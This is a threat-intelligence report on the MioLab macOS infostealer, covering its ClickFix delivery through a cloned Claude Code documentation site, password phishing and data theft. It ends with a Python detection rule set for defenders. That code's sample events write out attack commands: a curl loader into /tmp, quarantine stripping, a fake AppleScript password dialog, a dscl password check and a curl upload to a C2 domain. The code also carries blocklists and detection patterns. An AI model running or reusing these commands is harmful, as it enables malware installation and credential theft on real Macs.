MioLab Stealer for macOS Gains ClickFix Delivery, Wallet Theft, and Team API Tools
Key Takeaways
- MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums.
- The stealer now includes a “ClickFix” social engineering technique that leverages fake developer sites to trick victims into executing malicious Terminal commands, bypassing macOS Gatekeeper.
- Recent updates to MioLab’s capabilities include enhanced hardware wallet extraction, Safari cookie grabbing, Apple Notes decryption, and a full Team API for automated payload generation and data exfiltration.
- MioLab’s operators are linked to a broader cybercrime infrastructure, utilizing bulletproof hosting from FEMO IT Solutions Ltd. (Defhost) and repurposing old C2 domains for new phishing campaigns.
MioLab, an advanced macOS infostealer also identified as Nova, has solidified its position as a leading Malware-as-a-Service (MaaS) platform. This sophisticated threat is specifically engineered to compromise Apple systems, signaling a significant shift in the cybersecurity landscape where macOS is no longer considered a low-risk environment.
The malware’s prevalence on Russian-speaking underground forums underscores a growing trend where cybercriminals increasingly target macOS users. As Apple’s market share expands among high-value individuals such as software engineers, corporate executives, and cryptocurrency investors, Macs present an increasingly lucrative attack surface for threat actors.
MioLab operates through a user-friendly web panel and deploys a compact C-language payload, measuring approximately 100 KB. This minimal file size aids in evading detection by conventional signature-based antivirus solutions. The stealer is architecturally versatile, supporting both Intel x86-64 and Apple Silicon ARM64, and is compatible with macOS versions ranging from Sierra to Tahoe.
The malware’s extensive capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of password manager data, and exfiltration of files. A premium module further extends its reach to hardware wallets like Ledger and Trezor, enabling the theft of critical 24-word BIP39 recovery seed phrases.
Analysts at LevelBlue have closely monitored MioLab’s rapid evolution, noting an unusually accelerated development pace for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed substantial enhancements. These include a re-engineered hardware wallet extraction module, the ability to decrypt Apple Notes directly on the compromised device, a fully functional Safari cookie grabber, and the integration of a comprehensive Team API.
This newly implemented Team API significantly enhances operational efficiency for criminal groups, allowing them to programmatically generate payloads and download exfiltrated logs without direct interaction with the web panel. Furthermore, the platform incorporates Telegram bot binding, providing real-time victim notifications to organized cybercriminal affiliates, often referred to as “traffers.”
Investigations into MioLab’s infrastructure reveal that its operators manage a broader cybercrime ecosystem. The malware’s administrative panel, previously hosted at playavalon[.]org, has been repurposed to facilitate an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old command-and-control indicators into new fraudulent activities.
Both MioLab’s operations and the associated phishing campaigns have been traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand. This provider is known for sheltering various malware families, offering a protective layer against law enforcement intervention.
ClickFix Delivery: Social Engineering Through the Terminal
A particularly insidious addition to MioLab’s arsenal is its “ClickFix” infection chain. This technique employs social engineering to persuade victims into voluntarily executing malicious commands within their macOS Terminal. The malware’s panel features a one-click utility where operators simply input their server credentials, and the system automatically generates a Terminal payload. This payload is then disseminated through deceptive channels such as fake CAPTCHA pages or meticulously cloned developer portals.
Shortly before this publication, researcher Marcelo Rivero uncovered an active malvertising campaign distributing MioLab through a highly convincing replica of the documentation site for Claude Code, Anthropic's legitimate command-line AI tool. The clone was built to reach a specific victim profile.
The campaign was precisely engineered to ensnare high-value targets, particularly developers who are accustomed to executing commands in the Terminal. For Windows users, the cloned site presented entirely legitimate installation instructions, appearing visually authentic. However, macOS users were served a ClickFix-style payload.
The initial stage of the attack involved a Base64-encoded URL. Once decoded and executed, this launched a curl loader designed to retrieve the Mach-O payload, deposit it into the /tmp directory, and then run an xattr -c command. This command strips Apple’s Quarantine attribute, effectively bypassing Gatekeeper’s security protections.
After circumventing Gatekeeper, the malware forcibly closed any open Terminal windows and presented a fraudulent System Preferences password dialog via AppleScript. This tactic aimed to trick users into divulging their login credentials. The captured password was subsequently validated against the local directory service using the dscl utility. Upon successful verification, MioLab initiated a comprehensive data collection process, gathering browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. All collected data was then compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.
What You Should Do
- Exercise Caution with Password Prompts: Users should be highly suspicious of unexpected password dialogs, especially after installing or interacting with newly downloaded applications. Always verify the legitimacy of such prompts.
- Monitor Sensitive System Utilities: Security teams should implement strict monitoring or blocking policies for sensitive system utilities like dscl, osascript, and system_profiler when invoked by unsigned applications.
- Audit Access to Critical Directories: Regularly audit access to browser profile directories and the macOS Keychain file (login.keychain-db) to detect unauthorized activity.
- Block Malicious Domains: Implement network-level blocking for known malicious domains, including socifiapp[.]com, to prevent communication with C2 servers.
- Inspect Suspicious Network Traffic: Flag and investigate any suspicious curl POST requests directed to external APIs, as these may indicate data exfiltration attempts.
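The recommendations above map directly onto the ClickFix chain described earlier (curl loader into /tmp, xattr -c quarantine stripping, the AppleScript password dialog, dscl validation, Keychain access, and a curl POST to the C2). The following Python rule set is an added example, not code from LevelBlue, Marcelo Rivero or HackersRadar: it evaluates process-execution events of the kind an EDR or macOS Endpoint Security client records and reports which stages appear. The ProcEvent schema, the 198.51.100.7 loader address, the user name and every sample event are constructed for illustration; the two domains are the ones named in this report, de-fanged.

```python
"""Added example: detection rules for the MioLab ClickFix stages over
constructed process-execution events (schema and samples are assumptions)."""
import re
import shlex
from dataclasses import dataclass, field
from typing import List

BLOCKED_DOMAINS = {"socifiapp.com", "playavalon.org"}   # C2 and repurposed C2 from the report
SENSITIVE_UTILITIES = {"dscl", "osascript", "system_profiler"}
KEYCHAIN_DB = "login.keychain-db"
INTERNAL_HOSTS = {"localhost", "127.0.0.1", "::1"}     # assumption: anything else is external
CHAIN_STAGES = ["curl_download_to_tmp", "quarantine_strip_tmp", "osascript_password_dialog",
                "sensitive_utility_unsigned_parent", "keychain_db_access", "curl_post_external"]


@dataclass
class ProcEvent:                  # hypothetical event shape, loosely modelled on EDR telemetry
    pid: int
    cmdline: str
    signed: bool                  # this process's binary carries a valid code signature
    parent_signed: bool           # the process that launched it is signed
    files_opened: List[str] = field(default_factory=list)


def _argv(cmdline: str) -> List[str]:
    try:
        return shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to a whitespace split
        return cmdline.split()


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def _flag_values(args: List[str], flags) -> List[str]:
    """Values that follow any of the given flags, e.g. the file after -o."""
    return [args[i + 1] for i, a in enumerate(args) if a in flags and i + 1 < len(args)]


def _url_hosts(args: List[str]) -> List[str]:
    hosts = []
    for a in args:
        m = re.match(r"https?://([^/:?#]+)", a)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def classify(ev: ProcEvent) -> List[str]:
    """Names of the rules one event trips; an empty list means nothing matched."""
    argv = _argv(ev.cmdline)
    if not argv:
        return []
    prog, args = _basename(argv[0]), argv[1:]
    hits = []
    if prog == "curl":
        hosts = _url_hosts(args)
        if any(p.startswith("/tmp/") for p in _flag_values(args, {"-o", "--output"})):
            hits.append("curl_download_to_tmp")        # loader drops the Mach-O into /tmp
        is_post = "POST" in _flag_values(args, {"-X", "--request"}) or any(
            a in {"-d", "--data", "--data-binary", "-F", "--form", "-T", "--upload-file"} for a in args)
        if is_post and any(h not in INTERNAL_HOSTS for h in hosts):
            hits.append("curl_post_external")          # possible exfiltration upload
        if any(h in BLOCKED_DOMAINS for h in hosts):
            hits.append("blocked_domain")
    if prog == "xattr" and "-c" in args and any(a.startswith("/tmp/") for a in args):
        hits.append("quarantine_strip_tmp")            # clears the quarantine attribute Gatekeeper relies on
    if prog == "osascript" and "display dialog" in ev.cmdline and "hidden answer" in ev.cmdline:
        hits.append("osascript_password_dialog")       # AppleScript password prompt
    if prog in SENSITIVE_UTILITIES and not ev.parent_signed:
        hits.append("sensitive_utility_unsigned_parent")
    if not ev.signed and any(_basename(f) == KEYCHAIN_DB for f in ev.files_opened):
        hits.append("keychain_db_access")
    return hits


def observed_stages(events: List[ProcEvent]) -> List[str]:
    """Distinct chain stages seen across a batch of events, in CHAIN_STAGES order."""
    seen = {h for ev in events for h in classify(ev)}
    return [s for s in CHAIN_STAGES if s in seen]


def clickfix_chain_detected(events: List[ProcEvent], min_stages: int = 3) -> bool:
    """Single rules are noisy (developers do curl into /tmp); alert on several stages together."""
    return len(observed_stages(events)) >= min_stages


# Constructed sample: the chain from the report interleaved with benign activity.
SAMPLE_EVENTS = [
    ProcEvent(501, "/usr/bin/curl -fsSL http://198.51.100.7/pkg -o /tmp/.update", True, True),
    ProcEvent(502, "/usr/bin/xattr -c /tmp/.update", True, True),
    ProcEvent(503, "/tmp/.update", False, True),
    ProcEvent(504, "/usr/bin/osascript -e 'display dialog \"System Preferences wants to make changes.\" "
                   "default answer \"\" with hidden answer'", True, False),
    ProcEvent(505, "/usr/bin/dscl . -authonly jdoe", True, False),
    ProcEvent(506, "/tmp/.update", False, True,
              files_opened=["/Users/jdoe/Library/Keychains/login.keychain-db"]),
    ProcEvent(507, "/usr/bin/curl -X POST -F file=@/tmp/out.zip https://socifiapp.com/api/upload", True, False),
    ProcEvent(508, "/usr/bin/curl -X POST http://localhost:8080/health", True, True),   # benign
    ProcEvent(509, "/bin/ls -la /tmp", True, True),                                    # benign
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = classify(ev)
        if hits:
            print(f"pid {ev.pid}: {', '.join(hits)}  <- {ev.cmdline}")
    print("ClickFix chain detected:", clickfix_chain_detected(SAMPLE_EVENTS))
```

Each rule on its own would page an analyst too often (a developer fetching a file into /tmp trips the first one daily), so the batch-level check only fires when three or more distinct stages appear together, which is the shape of the chain rather than any single command.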
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.